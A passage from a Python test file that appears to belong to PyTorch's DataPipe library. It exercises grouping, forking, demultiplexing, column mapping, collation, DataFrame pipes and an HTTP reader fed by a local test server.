cached = list(datapipe2)
datapipe4 = dp.iter.RoutedDecoder(cached, decoder_basichandlers)
datapipe4.add_handler(_png_decoder)
_helper(cached, datapipe4, channel_first=True)
def test_groupby_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
file_list = [
"a.png", "b.png", "c.json", "a.json", "c.png", "b.json", "d.png",
"d.json", "e.png", "f.json", "g.png", "f.png", "g.json", "e.json",
"h.txt", "h.json"]
with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
for file_name in file_list:
file_pathname = os.path.join(temp_dir, file_name)
with open(file_pathname, 'w') as f:
f.write('12345abcde')
tar.add(file_pathname)
datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.TarArchiveReader(datapipe2)
def group_fn(data):
filepath, _ = data
return os.path.basename(filepath).split(".")[0]
datapipe4 = dp.iter.Grouper(datapipe3, group_key_fn=group_fn, group_size=2)
def order_fn(data):
data.sort(key=lambda f: f[0], reverse=True)
return data
datapipe5 = dp.iter.Mapper(datapipe4, fn=order_fn) # type: ignore[var-annotated]
expected_result = [
("a.png", "a.json"), ("c.png", "c.json"), ("b.png", "b.json"), ("d.png", "d.json"),
("f.png", "f.json"), ("g.png", "g.json"), ("e.png", "e.json"), ("h.txt", "h.json")]
count = 0
for rec, expected in zip(datapipe5, expected_result):
count = count + 1
self.assertEqual(os.path.basename(rec[0][0]), expected[0])
self.assertEqual(os.path.basename(rec[1][0]), expected[1])
for i in [0, 1]:
self.assertEqual(rec[i][1].read(), b'12345abcde')
rec[i][1].close()
self.assertEqual(count, 8)
def test_demux_mux_datapipe(self):
numbers = NumbersDataset(10)
n1, n2 = numbers.demux(2, lambda x: x % 2)
self.assertEqual([0, 2, 4, 6, 8], list(n1))
self.assertEqual([1, 3, 5, 7, 9], list(n2))
numbers = NumbersDataset(10)
n1, n2, n3 = numbers.demux(3, lambda x: x % 3)
n = n1.mux(n2, n3)
self.assertEqual(list(range(10)), list(n))
# Test Case: Uneven DataPipes
source_numbers = list(range(0, 10)) + [10, 12]
numbers_dp = dp.iter.IterableWrapper(source_numbers)
n1, n2 = numbers_dp.demux(2, lambda x: x % 2)
self.assertEqual([0, 2, 4, 6, 8, 10, 12], list(n1))
self.assertEqual([1, 3, 5, 7, 9], list(n2))
n = n1.mux(n2)
self.assertEqual(source_numbers, list(n))
@suppress_warnings # Suppress warning for lambda fn
def test_map_with_col_file_handle_datapipe(self):
temp_dir = self.temp_dir.name
datapipe1 = dp.iter.FileLister(temp_dir, '')
datapipe2 = dp.iter.FileLoader(datapipe1)
def _helper(datapipe):
dp1 = datapipe.map(lambda x: x.read(), input_col=1)
dp2 = datapipe.map(lambda x: (x[0], x[1].read()))
self.assertEqual(list(dp1), list(dp2))
# tuple
_helper(datapipe2)
# list
datapipe3 = datapipe2.map(lambda x: list(x))
_helper(datapipe3)
class TestDataFramesPipes(TestCase):
"""
Most of test will fail if pandas instaled, but no dill available.
Need to rework them to avoid multiple skips.
"""
def _get_datapipe(self, range=10, dataframe_size=7):
return NumbersDataset(range) \
.map(lambda i: (i, i % 3))
def _get_dataframes_pipe(self, range=10, dataframe_size=7):
return NumbersDataset(range) \
.map(lambda i: (i, i % 3)) \
._to_dataframes_pipe(
columns=['i', 'j'],
dataframe_size=dataframe_size)
@skipIfNoDataFrames
@skipIfNoDill # TODO(VitalyFedyunin): Decouple tests from dill by avoiding lambdas in map
def test_capture(self):
dp_numbers = self._get_datapipe().map(lambda x: (x[0], x[1], x[1] + 3 * x[0]))
df_numbers = self._get_dataframes_pipe()
df_numbers['k'] = df_numbers['j'] + df_numbers.i * 3
self.assertEqual(list(dp_numbers), list(df_numbers))
@skipIfNoDataFrames
@skipIfNoDill
def test_shuffle(self):
# With non-zero (but extremely low) probability (when shuffle do nothing),
# this test fails, so feel free to restart
df_numbers = self._get_dataframes_pipe(range=1000).shuffle()
dp_numbers = self._get_datapipe(range=1000)
df_result = [tuple(item) for item in df_numbers]
self.assertNotEqual(list(dp_numbers), df_result)
self.assertEqual(list(dp_numbers), sorted(df_result))
@skipIfNoDataFrames
@skipIfNoDill
def test_batch(self):
df_numbers = self._get_dataframes_pipe(range=100).batch(8)
df_numbers_list = list(df_numbers)
last_batch = df_numbers_list[-1]
self.assertEqual(4, len(last_batch))
unpacked_batch = [tuple(row) for row in last_batch]
self.assertEqual([(96, 0), (97, 1), (98, 2), (99, 0)], unpacked_batch)
@skipIfNoDataFrames
@skipIfNoDill
def test_unbatch(self):
df_numbers = self._get_dataframes_pipe(range=100).batch(8).batch(3)
dp_numbers = self._get_datapipe(range=100)
self.assertEqual(list(dp_numbers), list(df_numbers.unbatch(2)))
@skipIfNoDataFrames
@skipIfNoDill
def test_filter(self):
df_numbers = self._get_dataframes_pipe(range=10).filter(lambda x: x.i > 5)
self.assertEqual([(6, 0), (7, 1), (8, 2), (9, 0)], list(df_numbers))
class FileLoggerSimpleHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, logfile=None, **kwargs):
self.__loggerHandle = None
if logfile is not None:
self.__loggerHandle = open(logfile, 'a+')
super().__init__(*args, **kwargs)
def log_message(self, format, *args):
if self.__loggerHandle is not None:
self.__loggerHandle.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
return
def finish(self):
if self.__loggerHandle is not None:
self.__loggerHandle.close()
super().finish()
def setUpLocalServerInThread():
try:
Handler = partial(FileLoggerSimpleHTTPRequestHandler, logfile=None)
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(("", 0), Handler)
server_addr = "{host}:{port}".format(host=server.server_address[0], port=server.server_address[1])
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
# Wait a bit for the server to come up
time.sleep(3)
return (server_thread, server_addr, server)
except Exception:
raise
def create_temp_files_for_serving(tmp_dir, file_count, file_size,
file_url_template):
furl_local_file = os.path.join(tmp_dir, "urls_list")
with open(furl_local_file, 'w') as fsum:
for i in range(0, file_count):
f = os.path.join(tmp_dir, "webfile_test_{num}.data".format(num=i))
write_chunk = 1024 * 1024 * 16
rmn_size = file_size
while rmn_size > 0:
with open(f, 'ab+') as fout:
fout.write(os.urandom(min(rmn_size, write_chunk)))
rmn_size = rmn_size - min(rmn_size, write_chunk)
fsum.write(file_url_template.format(num=i))
class TestIterableDataPipeHttp(TestCase):
__server_thread: threading.Thread
__server_addr: str
__server: socketserver.TCPServer
@classmethod
def setUpClass(cls):
try:
(cls.__server_thread, cls.__server_addr,
cls.__server) = setUpLocalServerInThread()
except Exception as e:
warnings.warn("TestIterableDataPipeHttp could\
not set up due to {0}".format(str(e)))
@classmethod
def tearDownClass(cls):
try:
cls.__server.shutdown()
cls.__server_thread.join(timeout=15)
except Exception as e:
warnings.warn("TestIterableDataPipeHttp could\
not tear down (clean up temp directory or terminate\
local server) due to {0}".format(str(e)))
def _http_test_base(self, test_file_size, test_file_count, timeout=None,
chunk=None):
def _get_data_from_tuple_fn(data, *args, **kwargs):
return data[args[0]]
with tempfile.TemporaryDirectory(dir=os.getcwd()) as tmpdir:
# create tmp dir and files for test
base_tmp_dir = os.path.basename(os.path.normpath(tmpdir))
file_url_template = ("http://{server_addr}/{tmp_dir}/"
"/webfile_test_{num}.data\n")\
.format(server_addr=self.__server_addr, tmp_dir=base_tmp_dir,
num='{num}')
create_temp_files_for_serving(tmpdir, test_file_count,
test_file_size, file_url_template)
datapipe_dir_f = dp.iter.FileLister(tmpdir, '*_list')
datapipe_stream = dp.iter.FileLoader(datapipe_dir_f)
datapipe_f_lines = dp.iter.LineReader(datapipe_stream)
datapipe_line_url: IterDataPipe[str] = \
dp.iter.Mapper(datapipe_f_lines, _get_data_from_tuple_fn, (1,))
datapipe_http = dp.iter.HttpReader(datapipe_line_url,
timeout=timeout)
datapipe_tob = dp.iter.StreamReader(datapipe_http, chunk=chunk)
for (url, data) in datapipe_tob:
self.assertGreater(len(url), 0)
self.assertRegex(url, r'^http://.+\d+.data$')
if chunk is not None:
self.assertEqual(len(data), chunk)
else:
self.assertEqual(len(data), test_file_size)
@unittest.skip("Stress test on large amount of files skipped\
due to the CI timing constraint.")
def test_stress_http_reader_iterable_datapipes(self):
test_file_size = 10
# STATS: It takes about 5 hours to stress test 16 * 1024 * 1024
# files locally
test_file_count = 1024
self._http_test_base(test_file_size, test_file_count)
@unittest.skip("Test on the very large file skipped\
due to the CI timing constraint.")
def test_large_files_http_reader_iterable_datapipes(self):
# STATS: It takes about 11 mins to test a large file of 64GB locally
test_file_size = 1024 * 1024 * 128
test_file_count = 1
timeout = 30
chunk = 1024 * 1024 * 8
self._http_test_base(test_file_size, test_file_count, timeout=timeout,
chunk=chunk)
class IDP_NoLen(IterDataPipe):
def __init__(self, input_dp):
super().__init__()
self.input_dp = input_dp
# Prevent in-place modification
def __iter__(self):
input_dp = self.input_dp if isinstance(self.input_dp, IterDataPipe) else copy.deepcopy(self.input_dp)
for i in input_dp:
yield i
def _fake_fn(data):
return data
def _fake_add(constant, data):
return constant + data
def _fake_filter_fn(data):
return data >= 5
def _fake_filter_fn_constant(constant, data):
return data >= constant
def _worker_init_fn(worker_id):
random.seed(123)
class TestFunctionalIterDataPipe(TestCase):
# TODO(VitalyFedyunin): If dill installed this test fails
def _test_picklable(self):
arr = range(10)
picklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
(dp.iter.Mapper, dp.iter.IterableWrapper(arr), (), {}),
(dp.iter.Mapper, dp.iter.IterableWrapper(arr), (_fake_fn, (0, )), {}),
(dp.iter.Mapper, dp.iter.IterableWrapper(arr), (partial(_fake_add, 1), (0,)), {}),
(dp.iter.Collator, dp.iter.IterableWrapper(arr), (), {}),
(dp.iter.Collator, dp.iter.IterableWrapper(arr), (_fake_fn, (0, )), {}),
(dp.iter.Filter, dp.iter.IterableWrapper(arr), (_fake_filter_fn, (0, )), {}),
(dp.iter.Filter, dp.iter.IterableWrapper(arr), (partial(_fake_filter_fn, 5), (0,)), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
unpicklable_datapipes: List[Tuple[Type[IterDataPipe], IterDataPipe, Tuple, Dict[str, Any]]] = [
(dp.iter.Mapper, dp.iter.IterableWrapper(arr), (lambda x: x, ), {}),
(dp.iter.Collator, dp.iter.IterableWrapper(arr), (lambda x: x, ), {}),
(dp.iter.Filter, dp.iter.IterableWrapper(arr), (lambda x: x >= 5, ), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
with warnings.catch_warnings(record=True) as wa:
datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"^Lambda function is not supported for pickle")
with self.assertRaises(AttributeError):
p = pickle.dumps(datapipe)
def test_iterable_wrapper_datapipe(self):
input_ls = list(range(10))
input_dp = dp.iter.IterableWrapper(input_ls)
# Functional Test: values are unchanged and in the same order
self.assertEqual(input_ls, list(input_dp))
# Functional Test: deep copy by default when an iterator is initialized (first element is read)
it = iter(input_dp)
self.assertEqual(0, next(it)) # The deep copy only happens when the first element is read
input_ls.append(50)
self.assertEqual(list(range(1, 10)), list(it))
# Functional Test: shallow copy
input_ls2 = [1, 2, 3]
input_dp_shallow = dp.iter.IterableWrapper(input_ls2, deepcopy=False)
input_ls2.append(10)
self.assertEqual([1, 2, 3, 10], list(input_dp_shallow))
# Reset Test: reset the DataPipe
input_ls = list(range(10))
input_dp = dp.iter.IterableWrapper(input_ls)
n_elements_before_reset = 5
res_before_reset, res_after_reset = reset_after_n_next_calls(input_dp, n_elements_before_reset)
self.assertEqual(input_ls[:n_elements_before_reset], res_before_reset)
self.assertEqual(input_ls, res_after_reset)
# __len__ Test: inherits length from sequence
self.assertEqual(len(input_ls), len(input_dp))
def test_concat_datapipe(self):
input_dp1 = dp.iter.IterableWrapper(range(10))
input_dp2 = dp.iter.IterableWrapper(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.iter.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `IterDataPipe`"):
dp.iter.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
# Test Reset
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
input_dp_nl = IDP_NoLen(range(5))
concat_dp = input_dp1.concat(input_dp_nl)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(concat_dp)
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
def test_fork_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
with self.assertRaises(ValueError):
input_dp.fork(num_instances=0)
dp0 = input_dp.fork(num_instances=1)
self.assertEqual(dp0, input_dp)
# Test Case: making sure all child DataPipe shares the same reference
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
self.assertTrue(all(n1 is n2 and n1 is n3 for n1, n2, n3 in zip(dp1, dp2, dp3)))
# Test Case: one child DataPipe yields all value at a time
output1, output2, output3 = list(dp1), list(dp2), list(dp3)
self.assertEqual(list(range(10)), output1)
self.assertEqual(list(range(10)), output2)
self.assertEqual(list(range(10)), output3)
# Test Case: two child DataPipes yield value together
dp1, dp2 = input_dp.fork(num_instances=2)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i) for i in range(10)], output)
# Test Case: one child DataPipe yields all value first, but buffer_size = 5 being too small
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=5)
it1 = iter(dp1)
for _ in range(5):
next(it1)
with self.assertRaises(BufferError):
next(it1)
with self.assertRaises(BufferError):
list(dp2)
# Test Case: one child DataPipe yields all value first with unlimited buffer
with warnings.catch_warnings(record=True) as wa:
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=-1)
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Unlimited buffer size is set")
l1, l2 = list(dp1), list(dp2)
for d1, d2 in zip(l1, l2):
self.assertEqual(d1, d2)
# Test Case: two child DataPipes yield value together with buffer size 1
dp1, dp2 = input_dp.fork(num_instances=2, buffer_size=1)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i) for i in range(10)], output)
# Test Case: make sure logic related to slowest_ptr is working properly
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
output1, output2 , output3 = [], [], []
for i, (n1, n2) in enumerate(zip(dp1, dp2)):
output1.append(n1)
output2.append(n2)
if i == 4: # yield all of dp3 when halfway through dp1, dp2
output3 = list(dp3)
break
self.assertEqual(list(range(5)), output1)
self.assertEqual(list(range(5)), output2)
self.assertEqual(list(range(10)), output3)
# Test Case: DataPipe doesn't reset if this pipe hasn't been read
dp1, dp2 = input_dp.fork(num_instances=2)
i1, i2 = iter(dp1), iter(dp2)
output2 = []
for i, n2 in enumerate(i2):
output2.append(n2)
if i == 4:
i1 = iter(dp1) # Doesn't reset because i1 hasn't been read
self.assertEqual(list(range(10)), output2)
# Test Case: DataPipe reset when some of it have been read
dp1, dp2 = input_dp.fork(num_instances=2)
i1, i2 = iter(dp1), iter(dp2)
output1, output2 = [], []
for i, (n1, n2) in enumerate(zip(i1, i2)):
output1.append(n1)
output2.append(n2)
if i == 4:
with warnings.catch_warnings(record=True) as wa:
i1 = iter(dp1) # Reset both all child DataPipe
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
self.assertEqual(list(range(5)) + list(range(10)), output1)
self.assertEqual(list(range(5)) + list(range(10)), output2)
# Test Case: DataPipe reset, even when some other child DataPipes are not read
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(10)), output1)
self.assertEqual(list(range(10)), output2)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(10)), list(dp1)) # Resets even though dp3 has not been read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
output3 = []
for i, n3 in enumerate(dp3):
output3.append(n3)
if i == 4:
with warnings.catch_warnings(record=True) as wa:
output1 = list(dp1) # Resets even though dp3 is only partially read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
self.assertEqual(list(range(5)), output3)
self.assertEqual(list(range(10)), output1)
break
self.assertEqual(list(range(10)), list(dp3)) # dp3 has to read from the start again
# Test Case: Each DataPipe inherits the source datapipe's length
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
self.assertEqual(len(input_dp), len(dp1))
self.assertEqual(len(input_dp), len(dp2))
self.assertEqual(len(input_dp), len(dp3))
# Pickle Test:
dp1, dp2, dp3 = input_dp.fork(num_instances=3)
traverse(dp1) # This should not raise any error
for _ in zip(dp1, dp2, dp3):
pass
traverse(dp2) # This should not raise any error either
def test_mux_datapipe(self):
# Functional Test: Elements are yielded one at a time from each DataPipe, until they are all exhausted
input_dp1 = dp.iter.IterableWrapper(range(4))
input_dp2 = dp.iter.IterableWrapper(range(4, 8))
input_dp3 = dp.iter.IterableWrapper(range(8, 12))
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [0, 4, 8, 1, 5, 9, 2, 6, 10, 3, 7, 11]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Functional Test: Uneven input Data Pipes
input_dp1 = dp.iter.IterableWrapper([1, 2, 3, 4])
input_dp2 = dp.iter.IterableWrapper([10])
input_dp3 = dp.iter.IterableWrapper([100, 200, 300])
output_dp = input_dp1.mux(input_dp2, input_dp3)
expected_output = [1, 10, 100, 2, 200, 3, 300, 4]
self.assertEqual(len(expected_output), len(output_dp))
self.assertEqual(expected_output, list(output_dp))
# Functional Test: Empty Data Pipe
input_dp1 = dp.iter.IterableWrapper([0, 1, 2, 3])
input_dp2 = dp.iter.IterableWrapper([])
output_dp = input_dp1.mux(input_dp2)
self.assertEqual(len(input_dp1), len(output_dp))
self.assertEqual(list(input_dp1), list(output_dp))
# __len__ Test: raises TypeError when __len__ is called and an input doesn't have __len__
input_dp1 = dp.iter.IterableWrapper(range(10))
input_dp_no_len = IDP_NoLen(range(10))
output_dp = input_dp1.mux(input_dp_no_len)
with self.assertRaises(TypeError):
len(output_dp)
def test_demux_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
with self.assertRaises(ValueError):
input_dp.demux(num_instances=0, classifier_fn=lambda x: 0)
# Test Case: split into 2 DataPipes and output them one at a time
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(0, 10, 2)), output1)
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: split into 2 DataPipes and output them together
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output = []
for n1, n2 in zip(dp1, dp2):
output.append((n1, n2))
self.assertEqual([(i, i + 1) for i in range(0, 10, 2)], output)
# Test Case: values of the same classification are lumped together, and buffer_size = 3 being too small
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=4)
it1 = iter(dp1)
with self.assertRaises(BufferError):
next(it1) # Buffer raises because first 5 elements all belong to the a different child
with self.assertRaises(BufferError):
list(dp2)
# Test Case: values of the same classification are lumped together, and buffer_size = 5 is just enough
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: 0 if x >= 5 else 1, buffer_size=5)
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(5, 10)), output1)
self.assertEqual(list(range(0, 5)), output2)
# Test Case: values of the same classification are lumped together, and unlimited buffer
with warnings.catch_warnings(record=True) as wa:
dp1, dp2 = input_dp.demux(
num_instances=2,
classifier_fn=lambda x: 0 if x >= 5 else 1,
buffer_size=-1
)
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Unlimited buffer size is set")
output1, output2 = list(dp1), list(dp2)
self.assertEqual(list(range(5, 10)), output1)
self.assertEqual(list(range(0, 5)), output2)
# Test Case: classifer returns a value outside of [0, num_instance - 1]
dp0 = input_dp.demux(num_instances=1, classifier_fn=lambda x: x % 2)
it = iter(dp0[0])
with self.assertRaises(ValueError):
next(it)
next(it)
# Test Case: DataPipe doesn't reset when it has not been read
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
i1 = iter(dp1)
output2 = []
i = 0
for i, n2 in enumerate(dp2):
output2.append(n2)
if i == 4:
i1 = iter(dp1)
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: DataPipe reset when some of it has been read
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1, output2 = [], []
for n1, n2 in zip(dp1, dp2):
output1.append(n1)
output2.append(n2)
if n1 == 4:
break
with warnings.catch_warnings(record=True) as wa:
i1 = iter(dp1) # Reset all child DataPipes
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
for n1, n2 in zip(dp1, dp2):
output1.append(n1)
output2.append(n2)
self.assertEqual([0, 2, 4] + list(range(0, 10, 2)), output1)
self.assertEqual([1, 3, 5] + list(range(1, 10, 2)), output2)
# Test Case: DataPipe reset, even when not all child DataPipes are exhausted
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
output1 = list(dp1)
self.assertEqual(list(range(0, 10, 2)), output1)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(0, 10, 2)), list(dp1)) # Reset even when dp2 is not read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
output2 = []
for i, n2 in enumerate(dp2):
output2.append(n2)
if i == 1:
self.assertEqual(list(range(1, 5, 2)), output2)
with warnings.catch_warnings(record=True) as wa:
self.assertEqual(list(range(0, 10, 2)), list(dp1)) # Can reset even when dp2 is partially read
self.assertEqual(len(wa), 1)
self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
break
output2 = list(dp2) # output2 has to read from beginning again
self.assertEqual(list(range(1, 10, 2)), output2)
# Test Case: drop_none = True
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
drop_none=True)
self.assertEqual([2, 4, 6, 8], list(dp1))
self.assertEqual([1, 3, 7, 9], list(dp2))
# Test Case: drop_none = False
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
drop_none=False)
it1 = iter(dp1)
with self.assertRaises(ValueError):
next(it1)
# Test Case: __len__ not implemented
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
with self.assertRaises(TypeError):
len(dp1) # It is not implemented as we do not know length for each child in advance
with self.assertRaises(TypeError):
len(dp2)
# Pickle Test:
dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=odd_or_even)
traverse(dp1) # This should not raise any error
for _ in zip(dp1, dp2):
pass
traverse(dp2) # This should not raise any error either
def test_map_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
def fn(item, dtype=torch.float, *, sum=False):
data = torch.tensor(item, dtype=dtype)
return data if not sum else data.sum()
map_dp = input_dp.map(fn)
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.float))
map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
self.assertEqual(len(input_dp), len(map_dp))
for x, y in zip(map_dp, input_dp):
self.assertEqual(x, torch.tensor(y, dtype=torch.int).sum())
input_dp_nl = IDP_NoLen(range(10))
map_dp_nl = input_dp_nl.map(lambda x: x)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(map_dp_nl)
for x, y in zip(map_dp_nl, input_dp_nl):
self.assertEqual(x, torch.tensor(y, dtype=torch.float))
@suppress_warnings # Suppress warning for lambda fn
def test_map_tuple_list_with_col_datapipe(self):
def fn_11(d):
return -d
def fn_1n(d):
return -d, d
def fn_n1(d0, d1):
return d0 + d1
def fn_nn(d0, d1):
return -d0, -d1, d0 + d1
def _helper(ref_fn, fn, input_col=None, output_col=None):
for constr in (list, tuple):
datapipe = dp.iter.IterableWrapper([constr((0, 1, 2)), constr((3, 4, 5)), constr((6, 7, 8))])
res_dp = datapipe.map(fn, input_col, output_col)
ref_dp = datapipe.map(ref_fn)
self.assertEqual(list(res_dp), list(ref_dp))
# Reset
self.assertEqual(list(res_dp), list(ref_dp))
# Replacing with one input column and default output column
_helper(lambda data: (data[0], -data[1], data[2]), fn_11, 1)
_helper(lambda data: (data[0], (-data[1], data[1]), data[2]), fn_1n, 1)
# The index of input column is out of range
with self.assertRaises(IndexError):
_helper(None, fn_1n, 3)
# Unmatched input columns with fn arguments
with self.assertRaises(TypeError):
_helper(None, fn_n1, 1)
# Replacing with multiple input columns and default output column (the left-most input column)
_helper(lambda data: (data[1], data[2] + data[0]), fn_n1, [2, 0])
_helper(lambda data: (data[0], (-data[2], -data[1], data[2] + data[1])), fn_nn, [2, 1])
# output_col can only be specified when input_col is not None
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, 1)
# output_col can only be single-element list or tuple
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, [0, 1])
# Single-element list as output_col
_helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, [0])
# Replacing with one input column and single specified output column
_helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, 0)
_helper(lambda data: (data[0], data[1], (-data[1], data[1])), fn_1n, 1, 2)
# The index of output column is out of range
with self.assertRaises(IndexError):
_helper(None, fn_1n, 1, 3)
_helper(lambda data: (data[0], data[0] + data[2], data[2]), fn_n1, [0, 2], 1)
_helper(lambda data: ((-data[1], -data[2], data[1] + data[2]), data[1], data[2]), fn_nn, [1, 2], 0)
# Appending the output at the end
_helper(lambda data: (*data, -data[1]), fn_11, 1, -1)
_helper(lambda data: (*data, (-data[1], data[1])), fn_1n, 1, -1)
_helper(lambda data: (*data, data[0] + data[2]), fn_n1, [0, 2], -1)
_helper(lambda data: (*data, (-data[1], -data[2], data[1] + data[2])), fn_nn, [1, 2], -1)
@suppress_warnings # Suppress warning for lambda fn
def test_map_dict_with_col_datapipe(self):
def fn_11(d):
return -d
def fn_1n(d):
return -d, d
def fn_n1(d0, d1):
return d0 + d1
def fn_nn(d0, d1):
return -d0, -d1, d0 + d1
# Prevent modification in-place to support resetting
def _dict_update(data, newdata, remove_idx=None):
_data = dict(data)
_data.update(newdata)
if remove_idx:
for idx in remove_idx:
del _data[idx]
return _data
def _helper(ref_fn, fn, input_col=None, output_col=None):
datapipe = dp.iter.IterableWrapper(
[{"x": 0, "y": 1, "z": 2},
{"x": 3, "y": 4, "z": 5},
{"x": 6, "y": 7, "z": 8}]
)
res_dp = datapipe.map(fn, input_col, output_col)
ref_dp = datapipe.map(ref_fn)
self.assertEqual(list(res_dp), list(ref_dp))
# Reset
self.assertEqual(list(res_dp), list(ref_dp))
# Replacing with one input column and default output column
_helper(lambda data: _dict_update(data, {"y": -data["y"]}), fn_11, "y")
_helper(lambda data: _dict_update(data, {"y": (-data["y"], data["y"])}), fn_1n, "y")
# The key of input column is not in dict
with self.assertRaises(KeyError):
_helper(None, fn_1n, "a")
# Unmatched input columns with fn arguments
with self.assertRaises(TypeError):
_helper(None, fn_n1, "y")
# Replacing with multiple input columns and default output column (the left-most input column)
_helper(lambda data: _dict_update(data, {"z": data["x"] + data["z"]}, ["x"]), fn_n1, ["z", "x"])
_helper(lambda data: _dict_update(data, {"z": (-data["z"], -data["y"], data["y"] + data["z"])}, ["y"]), fn_nn, ["z", "y"])
# output_col can only be specified when input_col is not None
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, "x")
# output_col can only be single-element list or tuple
with self.assertRaises(ValueError):
_helper(None, fn_n1, None, ["x", "y"])
# Single-element list as output_col
_helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", ["x"])
# Replacing with one input column and single specified output column
_helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", "x")
_helper(lambda data: _dict_update(data, {"z": (-data["y"], data["y"])}), fn_1n, "y", "z")
_helper(lambda data: _dict_update(data, {"y": data["x"] + data["z"]}), fn_n1, ["x", "z"], "y")
_helper(lambda data: _dict_update(data, {"x": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "x")
# Adding new key to dict for the output
_helper(lambda data: _dict_update(data, {"a": -data["y"]}), fn_11, "y", "a")
_helper(lambda data: _dict_update(data, {"a": (-data["y"], data["y"])}), fn_1n, "y", "a")
_helper(lambda data: _dict_update(data, {"a": data["x"] + data["z"]}), fn_n1, ["x", "z"], "a")
_helper(lambda data: _dict_update(data, {"a": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "a")
def test_collate_datapipe(self):
arrs = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
input_dp = dp.iter.IterableWrapper(arrs)
def _collate_fn(batch):
return torch.tensor(sum(batch), dtype=torch.float)
collate_dp = input_dp.collate(collate_fn=_collate_fn)
self.assertEqual(len(input_dp), len(collate_dp))
for x, y in zip(collate_dp, input_dp):
self.assertEqual(x, torch.tensor(sum(y), dtype=torch.float))
input_dp_nl = IDP_NoLen(arrs)
